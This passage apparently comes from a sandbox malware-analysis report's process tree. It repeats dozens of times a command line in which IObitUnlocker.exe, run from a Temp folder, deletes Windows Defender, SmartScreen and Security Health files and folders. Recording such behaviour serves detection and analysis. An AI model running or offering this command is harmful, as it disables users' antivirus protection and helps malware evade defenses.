Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 